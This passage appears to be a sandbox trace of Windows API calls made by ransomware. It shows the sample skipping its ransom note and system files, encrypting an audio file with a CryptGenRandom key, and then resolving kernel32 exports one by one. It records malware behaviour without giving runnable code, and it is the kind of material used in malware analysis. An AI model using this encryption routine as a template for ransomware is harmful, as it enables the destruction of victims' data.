ftLastAccessTime.dwLowDateTime=0xaf0d0a40, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaf0d0a40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0085.315] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0085.315] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0085.315] FindNextFileW (in: hFindFile=0x5f8b18, lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14e1c550, ftCreationTime.dwHighDateTime=0x1d4cd82, ftLastAccessTime.dwLowDateTime=0xd98bd450, ftLastAccessTime.dwHighDateTime=0x1d4cd04, ftLastWriteTime.dwLowDateTime=0xd98bd450, ftLastWriteTime.dwHighDateTime=0x1d4cd04, nFileSizeHigh=0x0, nFileSizeLow=0xee03, dwReserved0=0x0, dwReserved1=0x0, cFileName="9w9ne up7xYdVEhiAPy.m4a", cAlternateFileName="9W9NEU~1.M4A")) returned 1 [0085.315] lstrcmpiW (lpString1="9w9ne up7xYdVEhiAPy.m4a", lpString2="DECRYPT-FILES.txt") returned -1 [0085.315] lstrcmpiW (lpString1="9w9ne up7xYdVEhiAPy.m4a", lpString2="autorun.inf") returned -1 [0085.315] lstrcmpiW (lpString1="9w9ne up7xYdVEhiAPy.m4a", lpString2="boot.ini") returned -1 [0085.315] lstrcmpiW (lpString1="9w9ne up7xYdVEhiAPy.m4a", lpString2="desktop.ini") returned -1 [0085.315] lstrcmpiW (lpString1="9w9ne up7xYdVEhiAPy.m4a", lpString2="ntuser.dat") returned -1 [0085.315] lstrcmpiW (lpString1="9w9ne up7xYdVEhiAPy.m4a", lpString2="iconcache.db") returned -1 [0085.315] lstrcmpiW (lpString1="9w9ne up7xYdVEhiAPy.m4a", lpString2="bootsect.bak") returned -1 [0085.315] lstrcmpiW (lpString1="9w9ne up7xYdVEhiAPy.m4a", lpString2="ntuser.dat.log") returned -1 [0085.315] lstrcmpiW (lpString1="9w9ne up7xYdVEhiAPy.m4a", lpString2="thumbs.db") returned -1 [0085.315] lstrcmpiW (lpString1="9w9ne up7xYdVEhiAPy.m4a", lpString2="Bootfont.bin") returned -1 [0085.315] lstrlenW (lpString="9w9ne up7xYdVEhiAPy.m4a") returned 23 [0085.315] lstrcmpiW (lpString1="m4a", lpString2="lnk") returned 1 [0085.315] lstrcmpiW (lpString1="m4a", lpString2="exe") returned 1 [0085.315] lstrcmpiW (lpString1="m4a", lpString2="sys") returned -1 [0085.315] lstrcmpiW (lpString1="m4a", lpString2="dll") returned 1 [0085.315] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\") returned 58 [0085.315] lstrlenW (lpString="9w9ne up7xYdVEhiAPy.m4a") returned 23 [0085.315] lstrcpyW (in: lpString1=0x3f2e428, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\" [0085.315] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\", lpString2="9w9ne up7xYdVEhiAPy.m4a" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\9w9ne up7xYdVEhiAPy.m4a") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\9w9ne up7xYdVEhiAPy.m4a" [0085.315] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0085.316] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\9w9ne up7xYdVEhiAPy.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\pnwitrglh_4la7ri\\6fqu\\9w9ne up7xydvehiapy.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x438 [0085.316] GetFileSizeEx (in: hFile=0x438, lpFileSize=0x3f2dbf0 | out: lpFileSize=0x3f2dbf0*=60931) returned 1 [0085.316] CreateFileMappingW (hFile=0x438, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x43c [0085.316] MapViewOfFile (hFileMappingObject=0x43c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0085.316] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0085.316] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0085.316] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0085.317] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfb0000*, pdwDataLen=0x3f2db58*=0x28, dwBufLen=0x100 | out: pbData=0xfb0000*, pdwDataLen=0x3f2db58*=0x100) returned 1 [0085.317] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0085.318] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.318] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0085.319] CloseHandle (hObject=0x43c) returned 1 [0085.319] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.319] WriteFile (in: hFile=0x438, lpBuffer=0xfb0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2db78, lpOverlapped=0x0 | out: lpBuffer=0xfb0000*, lpNumberOfBytesWritten=0x3f2db78*=0x108, lpOverlapped=0x0) returned 1 [0085.320] CloseHandle (hObject=0x0) returned 0 [0085.320] CloseHandle (hObject=0x438) returned 1 [0085.320] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.320] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.320] GetTickCount () returned 0x114dc9a [0085.321] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0085.321] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0085.321] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0085.321] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0085.321] lstrlenA (lpString="kernel32.dll") returned 12 [0085.321] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0085.321] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0085.322] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0085.322] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0085.322] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0085.322] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0085.322] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0085.322] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0085.322] lstrlenA (lpString="ADDATOMA") returned 8 [0085.322] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0085.322] lstrlenA (lpString="ADDATOMW") returned 8 [0085.322] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0085.322] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0085.322] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0085.322] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0085.322] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0085.322] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0085.322] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0085.322] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0085.322] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0085.322] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0085.322] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0085.322] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0085.322] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0085.322] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0085.322] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0085.322] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0085.322] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0085.322] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0085.322] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0085.322] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0085.322] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0085.322] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0085.322] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0085.322] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0085.322] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0085.322] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0085.322] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0085.322] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0085.322] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0085.323] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0085.323] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0085.323] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0085.323] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0085.323] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0085.323] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0085.323] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0085.323] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0085.323] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0085.323] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0085.323] lstrlenA (lpString="BACKUPREAD") returned 10 [0085.323] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0085.323] lstrlenA (lpString="BACKUPSEEK") returned 10 [0085.323] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0085.323] lstrlenA (lpString="BACKUPWRITE") returned 11 [0085.323] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0085.323] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0085.323] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0085.323] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0085.323] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0085.323] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0085.323] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0085.323] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0085.323] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0085.323] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0085.323] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0085.323] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0085.323] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0085.323] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0085.323] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0085.323] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0085.323] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0085.323] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0085.323] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0085.323] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0085.323] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0085.323] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0085.324] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0085.324] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0085.324] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0085.324] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0085.324] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0085.324] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0085.324] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0085.324] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0085.324] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0085.324] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0085.324] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0085.324] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0085.324] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0085.324] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0085.324] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0085.324] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0085.324] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0085.324] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0085.324] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0085.324] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0085.324] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0085.324] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0085.324] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0085.324] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0085.324] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0085.324] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0085.324] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0085.324] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0085.324] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0085.324] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0085.324] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0085.324] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0085.324] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0085.324] lstrlenA (lpString="BEEP") returned 4 [0085.324] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0085.324] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0085.325] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0085.325] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0085.325] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0085.325] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0085.325] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0085.325] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0085.325] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0085.325] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0085.325] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0085.325] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0085.325] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0085.325] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0085.325] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0085.325] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0085.325] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0085.325] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0085.325] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0085.325] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0085.325] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0085.325] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0085.325] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0085.325] lstrlenA (lpString="CANCELIO") returned 8 [0085.325] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0085.325] lstrlenA (lpString="CANCELIOEX") returned 10 [0085.325] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0085.325] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0085.325] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0085.325] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0085.325] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0085.325] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0085.325] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0085.325] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0085.325] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0085.325] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0085.325] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0085.325] lstrlenA (lpString="CHECKELEVATION") returned 14 [0085.325] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0085.325] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0085.326] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0085.326] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0085.326] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0085.326] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0085.326] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0085.326] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0085.326] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0085.326] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0085.326] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0085.326] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0085.326] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0085.326] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0085.326] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0085.326] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0085.326] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0085.326] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0085.326] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0085.326] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0085.326] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0085.326] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0085.326] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0085.326] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0085.326] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0085.326] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0085.326] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0085.326] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0085.326] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0085.326] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0085.326] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolTimer" | out: 